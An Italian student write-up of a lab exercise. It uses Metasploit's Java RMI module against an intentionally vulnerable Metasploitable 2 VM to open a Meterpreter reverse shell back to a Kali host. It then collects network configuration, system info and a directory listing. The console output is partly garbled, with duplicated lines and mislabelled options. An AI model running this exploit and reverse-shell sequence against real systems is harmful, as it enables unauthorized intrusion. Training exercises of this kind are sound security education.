PROGETTO W16D4

Il progetto ci porterà a sfruttare la vulnerabilità del servizio aperto sulla porta 1099 di Metasploitable 2. Java-RMI, una tecnologia che consente alle applicazioni Java di comunicare tra di loro attraverso la rete. Qui sotto lascio la traccia.

Traccia

La nostra macchina Metasploitable presenta un servizio vulnerabile sulla porta 1099 – Java RMI. Si richiede allo studente, ripercorrendo gli step visti nelle lezioni teoriche, di sfruttare la vulnerabilità con Metasploit al fine di ottenere una sessione di Meterpreter sulla macchina remota.

I requisiti dell'esercizio sono:

- La macchina attaccante (KALI) deve avere il seguente indirizzo IP: 192.168.11.111-La macchina vittima (Metasploitable) deve avere il seguente indirizzo IP: 192.168.11.112
- Una volta ottenuta una sessione remota Meterpreter, lo studente deve raccogliere le seguenti evidenze sulla macchina remota:
- 1) configurazione di rete;
- 2) informazioni sulla tabella di routing della macchina vittima
- 3) altro...

Configurazione di rete delle macchine virtuali

L'esercizio richiede un cambio di indirizzo per entrambe le macchine, Kali Linux e Metasploitable 2. Prima di procedere apportiamo le modiche sui foglii interfaces.

```
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

auto eth0
#iface eth0 inet dhcp
iface eth0 inet static
address 192.168.11.111/24
netmask 255.255.255.0
gateway 192.168.1.1
```

```
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
# iface eth0 inet dhcp
address 192.168.11.112/24_
netmask 255.255.255.0
network 192.168.1.3
broadcast 192.168.1.1
```

Attivazione Metasploit

Per mezzo di search cerchiamo il modulo che corrisponderà a quanto inserito: java_rmi. Ci serve il modulo sulla riga 1, che termina con default configuration code execution. Dopo averlo selezionato ci verrà assegnato il payload di default java/meterpreter/reverse_tcp.

```
-(kali⊕kali)-[~]
Metasploit tip: View a module's description using info, or the enhanced
version in your browser with info -d
      dBBBBBBb dBBBP dBBBBBB dBBBBBb
                                                           msfconsole
                                                            activation
    dB'dB'dB' dBBP
                                  dBP BB
  dB'dB'dB' dBP
                                                                 dB' .BP dBP
                                                       dBBBBP dBBBBP dBP
                              To boldly go where no
        0
                               shell has gone before
       =[ metasploit v6.3.55-dev
       -=[ 2397 exploits - 1235 auxiliary - 422 post
-=[ 1391 payloads - 46 encoders - 11 nops
       -=[ 9 evasion
Metasploit Documentation: https://docs.metasploit.com/
<u>msf6</u> > search java rmi
```

```
Matching Modules

# Name

0 auxiliary/gather/java_rmi_registry
1 exploit/multi/misc/java_rmi_server
2 auxiliary/scanner/misc/java_rmi_connection_impl
2 auxiliary/scanner/misc/java_rmi_connection_impl
3 exploit/multi/browser/java_rmi_connection_impl
2 auxiliary/scanner/misc/java_rmi_connection_impl
3 exploit/multi/browser/java_rmi_connection_impl
4 No payload configured, defaulting to java/meterpreter/reverse_tcp

msf6 > use 1
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit/multi/misc/java_rmi_scrops

Disclosure Date
Rank
Check
Description

normal No
Java RMI Registry Interfaces Enumeration

Java RMI Server Insecure Default Configuration Java Code Execution
Java RMI Server Insecure Endpoint Code Execution Scanner
Java RMI ConnectionImpl Deserialization Privilege Escalation

search
java rmi
java/mi
```

Inserimento indirizzi

Scegliamo l'indirizzo da attaccare e l'indirizzo dell'attaccante(dovrebbe essere già configurato, ma lo si può sempre inserire). Inseriamo set RHOSTS 192.168.11.112 per la vittima e set LHOST 192.168.11.111 per definire l'attaccante. Quando siamo soddisfatti del risultato di show options, avviamo il modulo con exploit.

```
Name Current Setting Required Description

HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 192.168.11.112 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html

RPORT 1099 yes The tocal host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.

SRYPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLCert no Path to a custom SSL certificate (default is randomly generated)

URIPATH no The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):

Name Current Setting Required Description

LHOST 192.168.11.111 yes The listen address (an interface may be specified)

Exploit target:

Id Name

Generic (Java Payload)
```

Exploit e testing controllo acquisito

La shell di Meterpreter è stata creata con successo. Possiamo infatti notare una session 1 in attesa dei nostri comandi. Partiamo con il comprendere quale sia la configurazione di rete del bersaglio.

```
msf6 exploit(multi/misc/java_rmi_server) > exploit

[*] Started reverse TCP handler on 192.168.11.111:4444

[*] 192.168.11.112:1099 - Using URL: http://192.168.11.111:8080/8ALMGbU2ExSGSMe

[*] 192.168.11.112:1099 - Server started.

[*] 192.168.11.112:1099 - Sending RMI Header...

[*] 192.168.11.112:1099 - Sending RMI Call...

[*] 192.168.11.112:1099 - Replied to request for payload JAR

[*] Sending stage (57971 bytes) to 192.168.11.112

[*] Meterpreter session 1 opened (192.168.11.111:4444 → 192.168.11.112:55137) at 2024-02-23 07:02:31 -0500
```

```
<u>meterpreter</u> > ifconfig
Interface 1
            : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
                                 ifconfig- network
                                  configuration
Interface 2
             : eth0 - eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.11.112
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fecd:4d11
IPv6 Netmask : ::
meterpreter >
```

Ovviamente abbiamo disposizione diverse manovre a seconda delle esigenze. Ad esempio possiamo visualizzare la tabella di routing del bersaglio.



Le cartelle e i loro permessi.

```
Mode
                  Size
                           Type Last modified
                                                            Name
                                                                  directories
040666/rw-rw-rw-
                 4096
                           dir
                                2012-05-13 23:35:33 -0400
                                                            bin
                                 2012-05-13 23:36:28 -0400
040666/rw-rw-rw-
                 1024
                           dir
                                                            boot
040666/rw-rw-rw- 4096
                                2010-03-16 18:55:51 -0400
                           dir
                                                            cdrom
                13540
040666/rw-rw-rw-
                                2024-02-23 06:49:32 -0500
                                                            dev
040666/rw-rw-rw-
                 4096
                           dir
                                 2024-02-23 06:49:38 -0500
                                                            etc
040666/rw-rw-rw-
                 4096
                                2010-04-16 02:16:02 -0400
                                                            home
040666/rw-rw-rw- 4096
                                2010-03-16 18:57:40 -0400
                                                            initrd
100666/rw-rw-rw-
                 7929183
                           fil
                                 2012-05-13 23:35:56 -0400
                                                            initrd.img
040666/rw-rw-rw-
                                 2012-05-13 23:35:22 -0400
                                                            lib
                           dir
                 4096
040666/rw-rw-rw-
                16384
                           dir
                                2010-03-16 18:55:15 -0400
                                                            lost+found
                                2010-03-16 18:55:52 -0400
                 4096
040666/rw-rw-rw-
                                                            media
040666/rw-rw-rw-
                 4096
                           dir
                                 2010-04-28 16:16:56 -0400
                          fil
100666/rw-rw-rw-
                 49081
                                2024-02-23 06:49:39 -0500
                                                            nohup.out
040666/rw-rw-rw- 4096
                          dir
                                2010-03-16 18:57:39 -0400
                                                            opt
040666/rw-rw-rw-
                 4096
                                 2024-01-26 16:49:50 -0500
                                                            privateshare
040666/rw-rw-rw-
                                 2024-02-23 06:49:19 -0500
                          dir
                 0
                                                            proc
040666/rw-rw-rw- 4096
                          dir
                                2024-02-23 06:49:39 -0500
040666/rw-rw-rw-
                                 2012-05-13 21:54:53 -0400
                 4096
                          dir
                                                            sbin
040666/rw-rw-rw-
                 4096
                          dir
                                 2010-03-16 18:57:38 -0400
                                2024-02-23 06:49:20 -0500
040666/rw-rw-rw- 0
                          dir
                                                            svs
                                 2024-02-18 16:31:52 -0500
040666/rw-rw-rw- 4096
                           dir
                                                            test_metasploit
040666/rw-rw-rw-
                 4096
                           dir
                                 2024-02-23 07:02:31 -0500
                                                            tmp
040666/rw-rw-rw-
                                 2010-04-28 00:06:37 -0400
                 4096
                           dir
                                                            usr
040666/rw-rw-rw- 4096
                           dir
                                 2010-03-17 10:08:23 -0400
                                                            var
                                 2008-04-10 12:55:41 -0400 vmlinuz
100666/rw-rw-rw- 1987288 fil
```

Informazioni sul sistema operativo per mezzo di syinfo.

```
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Architecture : x86
System Language : en_US
Meterpreter : java/linux
```

Possiamo anche creare una shell per interagire con Metasploitable 2. In questo modo abbiamo accesso ai comandi sul terminale di Linux, come whoami, oppure cat. Quando abbiamo finito con il nostro attacco lanciamo più volte exit per uscire.

```
meterpreter > shell
Process 1 created.
Channel 1 created.
Shell
```



